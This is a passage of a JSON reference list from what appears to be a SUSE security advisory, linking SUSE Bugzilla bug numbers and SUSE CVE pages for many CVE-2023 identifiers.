"summary": "SUSE Bug 1256606",
"url": "https://bugzilla.suse.com/1256606"
},
{
"category": "self",
"summary": "SUSE Bug 1256607",
"url": "https://bugzilla.suse.com/1256607"
},
{
"category": "self",
"summary": "SUSE Bug 1256609",
"url": "https://bugzilla.suse.com/1256609"
},
{
"category": "self",
"summary": "SUSE Bug 1256610",
"url": "https://bugzilla.suse.com/1256610"
},
{
"category": "self",
"summary": "SUSE Bug 1256611",
"url": "https://bugzilla.suse.com/1256611"
},
{
"category": "self",
"summary": "SUSE Bug 1256612",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "self",
"summary": "SUSE Bug 1256613",
"url": "https://bugzilla.suse.com/1256613"
},
{
"category": "self",
"summary": "SUSE Bug 1256616",
"url": "https://bugzilla.suse.com/1256616"
},
{
"category": "self",
"summary": "SUSE Bug 1256617",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "self",
"summary": "SUSE Bug 1256619",
"url": "https://bugzilla.suse.com/1256619"
},
{
"category": "self",
"summary": "SUSE Bug 1256622",
"url": "https://bugzilla.suse.com/1256622"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256625",
"url": "https://bugzilla.suse.com/1256625"
},
{
"category": "self",
"summary": "SUSE Bug 1256628",
"url": "https://bugzilla.suse.com/1256628"
},
{
"category": "self",
"summary": "SUSE Bug 1256630",
"url": "https://bugzilla.suse.com/1256630"
},
{
"category": "self",
"summary": "SUSE Bug 1256638",
"url": "https://bugzilla.suse.com/1256638"
},
{
"category": "self",
"summary": "SUSE Bug 1256641",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256646",
"url": "https://bugzilla.suse.com/1256646"
},
{
"category": "self",
"summary": "SUSE Bug 1256650",
"url": "https://bugzilla.suse.com/1256650"
},
{
"category": "self",
"summary": "SUSE Bug 1256651",
"url": "https://bugzilla.suse.com/1256651"
},
{
"category": "self",
"summary": "SUSE Bug 1256653",
"url": "https://bugzilla.suse.com/1256653"
},
{
"category": "self",
"summary": "SUSE Bug 1256654",
"url": "https://bugzilla.suse.com/1256654"
},
{
"category": "self",
"summary": "SUSE Bug 1256655",
"url": "https://bugzilla.suse.com/1256655"
},
{
"category": "self",
"summary": "SUSE Bug 1256659",
"url": "https://bugzilla.suse.com/1256659"
},
{
"category": "self",
"summary": "SUSE Bug 1256660",
"url": "https://bugzilla.suse.com/1256660"
},
{
"category": "self",
"summary": "SUSE Bug 1256664",
"url": "https://bugzilla.suse.com/1256664"
},
{
"category": "self",
"summary": "SUSE Bug 1256665",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "self",
"summary": "SUSE Bug 1256674",
"url": "https://bugzilla.suse.com/1256674"
},
{
"category": "self",
"summary": "SUSE Bug 1256680",
"url": "https://bugzilla.suse.com/1256680"
},
{
"category": "self",
"summary": "SUSE Bug 1256682",
"url": "https://bugzilla.suse.com/1256682"
},
{
"category": "self",
"summary": "SUSE Bug 1256688",
"url": "https://bugzilla.suse.com/1256688"
},
{
"category": "self",
"summary": "SUSE Bug 1256689",
"url": "https://bugzilla.suse.com/1256689"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256728",
"url": "https://bugzilla.suse.com/1256728"
},
{
"category": "self",
"summary": "SUSE Bug 1256730",
"url": "https://bugzilla.suse.com/1256730"
},
{
"category": "self",
"summary": "SUSE Bug 1256733",
"url": "https://bugzilla.suse.com/1256733"
},
{
"category": "self",
"summary": "SUSE Bug 1256737",
"url": "https://bugzilla.suse.com/1256737"
},
{
"category": "self",
"summary": "SUSE Bug 1256741",
"url": "https://bugzilla.suse.com/1256741"
},
{
"category": "self",
"summary": "SUSE Bug 1256742",
"url": "https://bugzilla.suse.com/1256742"
},
{
"category": "self",
"summary": "SUSE Bug 1256744",
"url": "https://bugzilla.suse.com/1256744"
},
{
"category": "self",
"summary": "SUSE Bug 1256752",
"url": "https://bugzilla.suse.com/1256752"
},
{
"category": "self",
"summary": "SUSE Bug 1256754",
"url": "https://bugzilla.suse.com/1256754"
},
{
"category": "self",
"summary": "SUSE Bug 1256757",
"url": "https://bugzilla.suse.com/1256757"
},
{
"category": "self",
"summary": "SUSE Bug 1256759",
"url": "https://bugzilla.suse.com/1256759"
},
{
"category": "self",
"summary": "SUSE Bug 1256760",
"url": "https://bugzilla.suse.com/1256760"
},
{
"category": "self",
"summary": "SUSE Bug 1256761",
"url": "https://bugzilla.suse.com/1256761"
},
{
"category": "self",
"summary": "SUSE Bug 1256763",
"url": "https://bugzilla.suse.com/1256763"
},
{
"category": "self",
"summary": "SUSE Bug 1256770",
"url": "https://bugzilla.suse.com/1256770"
},
{
"category": "self",
"summary": "SUSE Bug 1256773",
"url": "https://bugzilla.suse.com/1256773"
},
{
"category": "self",
"summary": "SUSE Bug 1256774",
"url": "https://bugzilla.suse.com/1256774"
},
{
"category": "self",
"summary": "SUSE Bug 1256777",
"url": "https://bugzilla.suse.com/1256777"
},
{
"category": "self",
"summary": "SUSE Bug 1256779",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "self",
"summary": "SUSE Bug 1256781",
"url": "https://bugzilla.suse.com/1256781"
},
{
"category": "self",
"summary": "SUSE Bug 1256785",
"url": "https://bugzilla.suse.com/1256785"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1256861",
"url": "https://bugzilla.suse.com/1256861"
},
{
"category": "self",
"summary": "SUSE Bug 1256863",
"url": "https://bugzilla.suse.com/1256863"
},
{
"category": "self",
"summary": "SUSE Bug 1257035",
"url": "https://bugzilla.suse.com/1257035"
},
{
"category": "self",
"summary": "SUSE Bug 1257053",
"url": "https://bugzilla.suse.com/1257053"
},
{
"category": "self",
"summary": "SUSE Bug 1257154",
"url": "https://bugzilla.suse.com/1257154"
},
{
"category": "self",
"summary": "SUSE Bug 1257155",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "self",
"summary": "SUSE Bug 1257158",
"url": "https://bugzilla.suse.com/1257158"
},
{
"category": "self",
"summary": "SUSE Bug 1257163",
"url": "https://bugzilla.suse.com/1257163"
},
{
"category": "self",
"summary": "SUSE Bug 1257164",
"url": "https://bugzilla.suse.com/1257164"
},
{
"category": "self",
"summary": "SUSE Bug 1257180",
"url": "https://bugzilla.suse.com/1257180"
},
{
"category": "self",
"summary": "SUSE Bug 1257202",
"url": "https://bugzilla.suse.com/1257202"
},
{
"category": "self",
"summary": "SUSE Bug 1257204",
"url": "https://bugzilla.suse.com/1257204"
},
{
"category": "self",
"summary": "SUSE Bug 1257207",
"url": "https://bugzilla.suse.com/1257207"
},
{
"category": "self",
"summary": "SUSE Bug 1257208",
"url": "https://bugzilla.suse.com/1257208"
},
{
"category": "self",
"summary": "SUSE Bug 1257215",
"url": "https://bugzilla.suse.com/1257215"
},
{
"category": "self",
"summary": "SUSE Bug 1257217",
"url": "https://bugzilla.suse.com/1257217"
},
{
"category": "self",
"summary": "SUSE Bug 1257218",
"url": "https://bugzilla.suse.com/1257218"
},
{
"category": "self",
"summary": "SUSE Bug 1257220",
"url": "https://bugzilla.suse.com/1257220"
},
{
"category": "self",
"summary": "SUSE Bug 1257221",
"url": "https://bugzilla.suse.com/1257221"
},
{
"category": "self",
"summary": "SUSE Bug 1257227",
"url": "https://bugzilla.suse.com/1257227"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257234",
"url": "https://bugzilla.suse.com/1257234"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257245",
"url": "https://bugzilla.suse.com/1257245"
},
{
"category": "self",
"summary": "SUSE Bug 1257277",
"url": "https://bugzilla.suse.com/1257277"
},
{
"category": "self",
"summary": "SUSE Bug 1257282",
"url": "https://bugzilla.suse.com/1257282"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257332",
"url": "https://bugzilla.suse.com/1257332"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257603",
"url": "https://bugzilla.suse.com/1257603"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-42752 page",
"url": "https://www.suse.com/security/cve/CVE-2023-42752/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53714 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53714/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53743 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53743/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53750 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53750/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53752 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53752/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53759 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53759/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53762 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53762/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53766 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53766/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53768 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53777 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53778 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53778/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53782 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53782/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53784 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53784/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53785 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53785/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53787 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53787/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53791 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53791/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53792 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53792/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53793 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53793/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53794 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53794/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53795 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53797 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53799 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53799/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53807 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53807/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53808 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53813 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53815 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53819 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53821 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53821/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53823 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53823/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53825 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53825/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53828 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53828/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53831 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53831/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53834 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53834/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53836 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53836/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53839 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53839/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53841 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53841/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53842 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53842/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53843 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53843/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53844 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53844/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53846 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53846/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53847 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53847/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53848 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53848/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53850 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53850/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53851 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53851/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53852 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53852/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53855 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53855/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53856 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53856/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53857 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53857/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53858 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53858/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53860 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53860/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53861 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53861/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53863 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53863/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53864 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53864/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53865 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53865/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53989 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53989/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53992 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53994 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53994/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53995 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53995/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53996 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53997 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53998 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53998/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53999 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54000 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54001 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54005 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54006 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54008 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54008/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54013 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54013/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54014 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54014/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54016 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54016/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54017 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54017/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54019 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54019/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54022 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54022/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54023 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54023/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54025 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54025/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54026 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54026/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54027 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54027/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54030 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54030/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54031 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54031/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54032 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54032/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54035 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54035/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54037 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54037/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54038 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54038/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54042 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54042/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54045 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54045/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54048 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54048/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54049 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54049/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54051 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54051/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54052 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54052/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54060 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54060/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54064 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54066 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54067 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54067/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54069 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54069/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54070 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54070/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54072 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54072/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54076 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54080 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54081 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54083 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54088 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54089 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54091 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54092 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54092/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54093 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54094 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54095 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54096 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54096/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54099 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54101 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54104 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54104/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54106 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54112 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54113 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54113/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54115 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54115/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54117 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54117/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54121 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54121/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54125 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54125/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54127 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54127/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54133 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54134 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54134/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54135 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54136 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54137 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54140 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54140/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54141 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54142 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54143 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54145 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54148 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54148/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54149 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54153 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54153/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54154 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54155 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54155/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54156 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54164 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54164/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54166 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54166/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54169 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54169/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54170 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54170/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54171 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54171/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54172 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54172/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54173 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54173/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54177 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54177/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54178 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54179 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54179/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54181 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54181/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54183 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54183/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54185 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54185/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54189 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54189/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54194 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54194/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54201 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54201/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54204 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54204/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54207 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54207/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54209 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54210 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54210/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54211 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54211/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54215 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54215/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54219 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54219/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54220 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54220/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54221 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54221/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54223 page",
